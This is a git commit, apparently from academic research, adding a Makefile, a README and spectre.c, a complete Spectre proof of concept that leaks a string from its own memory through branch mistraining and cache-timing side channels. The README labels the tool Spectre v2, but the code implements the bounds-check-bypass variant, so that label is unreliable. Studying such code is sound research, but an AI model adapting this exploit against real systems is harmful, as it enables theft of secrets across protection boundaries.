first

2022-01-22 15:04:17 +01:00 · 2022-01-22 15:04:17 +01:00 · 6c445d1339
commit 6c445d1339
5 changed files with 338 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1 @@
 spectre-*
--- a/44
+++ b/44
@ -0,0 +1,44 @@
 DEPENDENCIES=	glibc-static
 CC=		clang
 PROG=		spectre
 CFLAGS=		-march=native
 CFLAGS+=	-W
 CFLAGS+=	-Wall
 CFLAGS+=	-Werror
 CFLAGS+=	-Wno-unused-parameter
 CFLAGS+=	-Wno-missing-field-initializers
 OPTIMIZATIONS=	0 1 2 3
 LINKAGE=	static
 OPROGS=		$(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG)))
 PROGS+=		$(OPROGS) $(foreach L, $(LINKAGE), $(addsuffix -$(L), $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG)))))
 .PHONY: clean
 .SILENT:
 .NOTPARALLEL:
 all: $(PROGS)
 	echo -e "\033[1mCPU\t\t" $$(LC_ALL=en_US.UTF-8 lscpu | grep "Model name" | cut -d":" -f 2 | sort | uniq | awk '{$$1=$$1;print}')
 	echo -e "Kernel\t\t"     $$(uname -a)
 	echo -e "Test date\t"    $$(date "+%d-%m-%Y")
 	echo -e "Clang\t\t"      $$(clang -v 2>&1 | head -n 1)"\033[0m"
 	for p in $(PROGS); do \
 		sleep 1; \
 		echo -e "\033[4m$$p\033[0m "; \
 		taskset 01 ./$$p; \
 		echo; done
 $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))):
 	$(CC) $(CFLAGS) -$(word 2, $(subst -, ,$@))  -o $@ $(PROG).c
 $(foreach L, $(LINKAGE), $(addsuffix -$(L), $(foreach O, $(OPTIMIZATIONS), $(addsuffix -O$(O), $(PROG))))):
 	$(CC) $(addprefix -, $(word 3, $(subst -, ,$@))) $(CFLAGS) -$(word 2, $(subst -, ,$@))  -o $@ $(PROG).c
 clean:
 	rm -rf $(PROGS)
--- a/README.md
+++ b/README.md
@ -0,0 +1,21 @@
 OCTOPUS
 ---
 Samuel AUBERTIN - EURECOM
 ![SPECTRE Octopus Logo](logo.png "SPECTRE Octopus Logo")
 OCTOPUS is a [Spectre v2](https://spectreattack.com/spectre.pdf) _Branch Target Injection_] compiler flag tester for [CVE 2017-5715](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715).
 # Dependencies
 - ```clang```
 - ```glibc-static```
 # Execution
 ```make```
 # Results aggregation
 TODO
--- a/logo.png
+++ b/logo.png
--- a/spectre.c
+++ b/spectre.c
@ -0,0 +1,272 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
 #include <getopt.h>
 #include <string.h>
 #ifdef _MSC_VER
 #include <intrin.h> /* for rdtscp and clflush */
 #pragma optimize("gt",on)
 #else
 #include <x86intrin.h> /* for rdtscp and clflush */
 #endif
 #if defined(__i386__) || defined(__amd64__)
 #define CACHELINESIZE	64
 static int	_has_rdtscp;
 #else
 #error "unsupported architecture"
 #endif
 #if defined(__i386__)
 #define PUSH(r)		"pushl	%%e" #r "x\n"
 #define POP(r)		"popl	%%e" #r "x\n"
 #elif defined(__amd64__)
 #define PUSH(r)		"pushq	%%r" #r "x\n"
 #define POP(r)		"popq	%%r" #r "x\n"
 #endif
 char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
 unsigned int 	array1_size = 16;
 uint8_t 	unused1[64];
 uint8_t 	array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
 uint8_t 	unused2[64];
 uint8_t 	array2[256 * 512];
 uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
 unsigned	cache_hit_threshold;
 int		verbose;
 static inline unsigned
 timedaccess(volatile uint8_t *addr)
 {
 	uint64_t	t0, t1;
        #pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int junk = junk;
 	if (_has_rdtscp) {
 		t0 = __rdtscp(& junk);
 		junk |= *addr;
 		t1 = __rdtscp(& junk);
 	} else {
 		t0 = __rdtsc();
 		junk |= *addr;
 		t1 = __rdtsc();
 	}	
 	return (unsigned)(t1 - t0);
 }
 static void
 calibrate_clock(int verbose, unsigned int *threshold)
 {
 	volatile char buf[2 * CACHELINESIZE];
 	volatile uint8_t *bufp;
 	__attribute__((unused)) volatile int junk = 0;
 	int i;
 	const int cnt = 1000;
 	uint64_t tcache, tmem;
 	unsigned cap;
 	__asm__ volatile (
 	    PUSH(a)
 	    PUSH(b)
 	    PUSH(c)
 	    PUSH(d)
 	    "mov	$0x80000001,%%eax\n"
 	    "mov	$0,%%ecx\n"
 	    "cpuid\n"
 	    "mov	%%edx,%0\n"
 	    POP(d)
 	    POP(c)
 	    POP(b)
 	    POP(a)
 	    : "=m" (cap)
 	    /*
 	     * clang sometimes stores the result using an offset relative to
 	     * %esp! That won't work, because we modify %esp with push and pop.
 	     * Hence, prevent them compiler from using %esp!
 	     */
 	    :: "esp" );
 #define HAVE_RDTSCP	(1U << 27)
 	if (cap & HAVE_RDTSCP) {
 		if (verbose)
 			printf("CPU has RDTSCP\n");
 		_has_rdtscp = 1;
 	} else {
 		if (verbose)
 			printf("WARNING: CPU has no RDTSCP support, using RDTSC.\n");
 		_has_rdtscp = 0;
 	}
 	/* On i386 PIC we have to preserve %ebx, too */
 	__asm__ volatile (
 	    PUSH(a)
 	    PUSH(b)
 	    PUSH(c)
 	    PUSH(d)
 	    "mov	$0x7,%%eax\n"
 	    "mov	$0,%%ecx\n"
 	    "cpuid\n"
 	    "mov	%%ebx, %0\n"
 	    POP(d)
 	    POP(c)
 	    POP(b)
 	    POP(a)
 	    : "=m" (cap)
 	    :: "esp" );
 	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
 	    ~(CACHELINESIZE - 1)));
 	junk |= *bufp;
 	for (i = 0, tcache = 0; i < cnt; i++)
 		tcache += timedaccess(bufp);
 	tcache /= cnt;
 	for (i = 0, tmem = 0; i < cnt; i++) {
 		_mm_clflush((const void *)bufp);
 		_mm_mfence();
 		tmem += timedaccess(bufp);
 	}
 	tmem /= cnt;
 	if (threshold != NULL) {
 		*threshold = tcache + (tmem - tcache) / 2;
 		if (*threshold == (unsigned int)tmem)
 			(*threshold)--;
 	}
 	if (verbose) {
 		printf("Access time: memory %lu, cache %lu", tmem, tcache);
 		if (threshold)
 			printf(" -> threshold %d", *threshold);
 		printf("\n");
 	}
 	return;
 }
 void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
 }
 void
 leak(
 	size_t		malicious_x,
 	uint8_t		value[2],
 	int		score[2],
 	unsigned	cache_hit_threshold
 	)
 {
 	static int		results[256];
 	int 			tries, i, j, mix_i;
 	unsigned int 		junk = 0;
 	size_t 			training_x, x;
 	register uint64_t 	time1, time2;
 	volatile uint8_t 	*addr;
 	for (i = 0; i < 256; i++)
 		results[i] = 0;
 	for (tries = 999; tries > 0; tries--) {
 	/* Flush array2[256*(0..255)] from cache */
 	for (i = 0; i < 256; i++)
 	_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
 	/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
 	training_x = tries % array1_size;
 	for (j = 29; j >= 0; j--) {
 		_mm_clflush(&array1_size);
 		for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
 		//_mm_mfence(); NOT WORKING
 		/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
 		/* Avoid jumps in case those tip off the branch predictor */
 		x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
 		x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
 		x = training_x ^ (x & (malicious_x ^ training_x));
 		/* Call the victim! */
 		victim_function(x);
 	}
 	/* Time reads. Order is lightly mixed up to prevent stride prediction */
 	for (i = 0; i < 256; i++) {
 		mix_i = ((i * 167) + 13) & 255;
 		addr = & array2[mix_i * 512];
 		time1 = __rdtscp(& junk); /* READ TIMER */
 		junk = *addr; /* MEMORY ACCESS TO TIME */
 		time2 = __rdtscp(& junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
 		if (time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size])
 		results[mix_i]++; /* cache hit - add +1 to score for this value */
 	}
 	/* Locate highest & second-highest results tallies in j */
 	j = -1;
 	for (i = 0; i < 256; i++) {
 		if (j < 0 || results[i] >= results[j]) {
 			j = i;
 		}
 	}
 	if (results[j] == 3)
 		break;
 	}
 	results[0] ^= junk; /* use junk so code above won’t get optimized out*/
 	value[0] = (uint8_t) j;
 	score[0] = results[j];
 	//value[1] = (uint8_t) k;
 	//score[1] = results[k];
 }
 int 
 main(int argc, char ** argv) 
 {
 	int		o;
 	size_t 		malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
 	int 		i, score[2], len = (int)strlen(secret);
  	uint8_t 	value[2];
  	unsigned 	sucesses = 0;
 	while ((o = getopt(argc, argv, "t:v")) != EOF) {
 		switch (o) {
 			case 't':
 				cache_hit_threshold = atoi(optarg);
 				break;
 			case 'v':
 				verbose++;
 				break;
 			default:
 			usage:
 				fprintf(stderr, "usage: %s [-v] "
 			    "[-t threshold]\n", argv[0]);
 				return 2;
 		}
 	}
 	if (argc != optind)
 		goto usage;
 	calibrate_clock(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
 	for (i = 0; i < (int)sizeof(array2); i++)
 		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
 	if(verbose) {
 		printf("Threshold is: %d\n", cache_hit_threshold);
 		printf("Leaking %d bytes:\n", (int)strlen(secret));
 	}
 	while (--len >= 0) {
 		leak(malicious_x++, value, score, cache_hit_threshold);
 		if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
 			sucesses++;
 			fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
 		} else {
 			fprintf(stderr, "\033[31m?\033[0m");
 		}	
 	}
 	fprintf(stderr, "\n");
 	printf("%.0f%%\n", 100 * sucesses / (float)strlen(secret));
 	_mm_mfence();
 	return 0;
 }